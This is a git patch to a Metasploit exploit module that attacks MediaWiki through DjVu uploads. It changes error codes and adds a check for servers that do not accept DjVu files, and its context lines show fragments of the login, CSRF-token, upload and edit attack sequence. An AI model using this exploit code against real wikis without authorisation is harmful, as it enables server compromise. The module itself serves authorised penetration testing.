From 57f4998568b99c47da2f95ed6d274e7d7a447d43 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 2 Feb 2014 16:26:22 +0000
Subject: [PATCH] Better failures and handle unconfigured server

---
 modules/exploits/multi/http/mediawiki_djvu.rb | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/http/mediawiki_djvu.rb b/modules/exploits/multi/http/mediawiki_djvu.rb
index c396f2578f..b9727a8e18 100644
--- a/modules/exploits/multi/http/mediawiki_djvu.rb
+++ b/modules/exploits/multi/http/mediawiki_djvu.rb
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
     wp_login_token = get_token_value(response_html, 'wpLoginToken')
 
     unless wp_login_token
-      fail_with(Failure::NotFound, "Couldn't find login token. Is URI set correctly?")
+      fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")
     else
       print_good("Retrieved login CSRF token.")
     end
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if login and login.code == 302
       print_good("Log in successful.")
     else
-      fail_with(Failure::NotFound, "Failed to log in.")
+      fail_with(Failure::NoAccess, "Failed to log in.")
     end
 
     auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')
@@ -188,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
     title = get_token_value(upload_file_html, 'title')
 
     unless wp_edit_token
-      fail_with(Failure::NotFound, "Couldn't find upload token. Is URI set correctly?")
+      fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")
     else
       print_good("Retrieved upload CSRF token.")
     end
@@ -223,7 +223,11 @@ class Metasploit3 < Msf::Exploit::Remote
       location = upload.headers['Location']
       print_good("File uploaded to #{location}")
     else
-      fail_with(Failure::Unknown, "Failed to upload file.")
+      if upload.body.include? 'not a permitted file type'
+        fail_with(Failure::NotVulnerable, "Wiki is not configured for DjVu files.")
+      else
+        fail_with(Failure::UnexpectedReply, "Failed to upload file.")
+      end
     end
 
     random_page = rand_text_alpha(8)
@@ -239,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     unless random_edit and random_edit.code == 200
-      fail_with(Failure::Unknown, "Failed to open target edit page: #{random_page}.")
+      fail_with(Failure::NotFound, "Failed to open target edit page: #{random_page}.")
     end
 
     random_html = Nokogiri::HTML(random_edit.body)
@@ -255,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if wp_edit_token
       print_good("Retrieved edit CSRF token.")
     else
-      fail_with(Failure::Unknown, "Failed to retrieve edit CSRF token.")
+      fail_with(Failure::UnexpectedReply, "Failed to retrieve edit CSRF token.")
     end
 
     edit_mime = Rex::MIME::Message.new
@@ -284,7 +288,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 1)
 
     if edit
-      print_error("Payload probably failed...")
+      fail_with(Failure::PayloadFailed, "Server responded to edit request (Not expected).")
     end
   end